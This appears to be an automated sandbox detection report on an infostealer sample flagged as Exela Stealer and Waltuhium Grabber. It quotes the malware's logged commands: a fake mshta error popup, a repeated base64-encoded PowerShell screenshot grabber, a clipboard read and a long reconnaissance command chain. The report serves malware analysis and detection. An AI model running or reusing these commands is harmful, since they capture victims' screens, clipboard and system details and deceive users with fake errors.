    00000001.00000003.1775700959.000002D9ABFF2000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_ExelaStealerYara detected Exela StealerJoe Security
      00000001.00000003.1775700959.000002D9ABFF2000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GenericPythonStealerYara detected Generic Python StealerJoe Security
        00000001.00000003.1775700959.000002D9ABFF2000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_WaltuhiumGrabberYara detected Waltuhium GrabberJoe Security
          00000001.00000003.1775700959.000002D9ABFF2000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PythonStealerYara detected Python StealerJoe Security
            Click to see the 50 entries

            System Summary

            barindex
            Source: Process startedAuthor: Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule): Data: Command: mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()", CommandLine: mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()", CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6560, ParentProcessName: cmd.exe, ProcessCommandLine: mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()", ProcessId: 2812, ProcessName: mshta.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
            Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
            Source: Process startedAuthor: _pete_0, TheDFIRReport: Data: Command: chcp, CommandLine: chcp, CommandLine|base64offset|contains: r), Image: C:\Windows\System32\chcp.com, NewProcessName: C:\Windows\System32\chcp.com, OriginalFileName: C:\Windows\System32\chcp.com, ParentCommandLine: cmd.exe /c chcp, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4364, ParentProcessName: cmd.exe, ProcessCommandLine: chcp, ProcessId: 352, ProcessName: chcp.com
            Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\dens.exe", ParentImage: C:\Users\user\Desktop\dens.exe, ParentProcessId: 6500, ParentProcessName: dens.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard", ProcessId: 1352, ProcessName: cmd.exe
            Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
            Source: Process startedAuthor: Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems): Data: Command: net localgroup administrators, CommandLine: net localgroup administrators, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3652, ParentProcessName: cmd.exe, ProcessCommandLine: net localgroup administrators, ProcessId: 7588, ProcessName: net.exe
            Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8184, TargetFilename: C:\Users\user\AppData\Local\Temp\mugnbzbx\mugnbzbx.cmdline
            Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: net user, CommandLine: net user, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3652, ParentProcessName: cmd.exe, ProcessCommandLine: net user, ProcessId: 7456, ProcessName: net.exe
            Source: Process startedAuthor: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: net user, CommandLine: net user, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3652, ParentProcessName: cmd.exe, ProcessCommandLine: net user, ProcessId: 7456, ProcessName: net.exe
